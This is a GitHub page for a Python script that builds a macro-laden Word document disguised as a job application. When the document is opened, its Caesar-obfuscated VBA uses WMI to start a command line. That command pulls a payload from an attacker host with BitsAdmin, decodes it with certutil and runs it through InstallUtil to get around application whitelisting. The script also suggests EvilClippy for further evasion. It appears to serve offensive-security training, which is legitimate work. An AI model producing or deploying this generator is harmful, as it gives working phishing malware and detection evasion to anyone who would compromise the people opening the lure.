-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathgenerate_winword_macro.py
More file actions
executable file
·116 lines (84 loc) · 2.83 KB
/
generate_winword_macro.py
File metadata and controls
executable file
·116 lines (84 loc) · 2.83 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
import aspose.words as aw
import ak
CAESAR_NUM = 17
DOC_NAME = "Job Application 53.doc"
# Change to false if needing a 32-bit version
IS_64BIT = True
if IS_64BIT:
FRAMEWORK = "Framework64"
else:
FRAMEWORK = "Framework"
VBA_MACRO = """
Function Pears(Beets)
Pears = Chr(Beets - {CAESAR_NUM})
End Function
Function Strawberries(Grapes)
Strawberries = Left(Grapes, 3)
End Function
Function Almonds(Jelly)
Almonds = Right(Jelly, Len(Jelly) - 3)
End Function
Function Rats(Milk)
Do
Oatmilk = Oatmilk + Pears(Strawberries(Milk))
Milk = Almonds(Milk)
Loop While Len(Milk) > 0
Rats = Oatmilk
End Function
Sub MyMacro()
Dim Apples As String
Dim Water As String
If ActiveDocument.Name <> Rats("{DOC_NAME}") Then
Exit Sub
End If
Apples = "{CMD}"
Water = Rats(Apples)
GetObject(Rats("{OBJ}")).Get(Rats("{GET}")).Create Water, Tea, Coffee, Napkins
End Sub
Sub AutoOpen()
MyMacro
End Sub
Sub Document_Open()
MyMacro
End Sub
"""
CMD = f"cmd.exe /c BitsAdmin /Transfer myJob http://{ak.LHOST}/Bypass.txt C:\\Windows\\tasks\\bp.txt && certutil -f -decode C:\\Windows\\tasks\\bp.txt C:\\Windows\\tasks\\bp && del C:\\Windows\\tasks\\bp.txt && C:\\Windows\\Microsoft.NET\\{FRAMEWORK}\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U C:\\Windows\\tasks\\bp"
def encrypt_string(text):
result = ""
for i in range(len(text)):
c = text[i]
e = ord(text[i]) + CAESAR_NUM
result += str(e).zfill(3)
return result
def create_doc():
VBA_DOCNAME=encrypt_string(DOC_NAME)
#VBA_CMD = encrypt_string(CMD)
VBA_OBJ = encrypt_string("winmgmts:")
VBA_GET = encrypt_string("Win32_Process")
CMD_ENC = encrypt_string(CMD)
VBA_CMD_CHUNKS = [CMD_ENC[i:i+50] for i in range(0, len(CMD_ENC), 50)]
VBA_CMD = "\" _ \n& \"".join(VBA_CMD_CHUNKS)
doc = aw.Document()
# doc = aw.Document("DocTemplate.docm")
doc.compatibility_options.optimize_for(aw.settings.MsWordVersion.WORD2003)
builder = aw.DocumentBuilder(doc)
builder.writeln("Hello world!")
project = aw.vba.VbaProject()
project.name = "Aspose.Project"
old_module = project.modules.get_by_name("ThisDocument")
new_module = project.modules.get_by_name("ThisDocument").clone()
new_module.source_code = VBA_MACRO.format(DOC_NAME=VBA_DOCNAME, CMD=VBA_CMD, OBJ=VBA_OBJ, GET=VBA_GET, CAESAR_NUM=CAESAR_NUM)
print("VBA Code:")
print(new_module.source_code)
project.modules.remove(old_module)
project.modules.add(new_module)
doc.vba_project = project
doc.save(DOC_NAME, aw.SaveFormat.DOCM)
def main():
create_doc()
print("Document saved as: "+DOC_NAME)
print("Macro will run: " + CMD)
print("Use EvilClippy to further hide detection")
print("REMEMBER to re-save macro using Word")
if __name__ == "__main__":
main()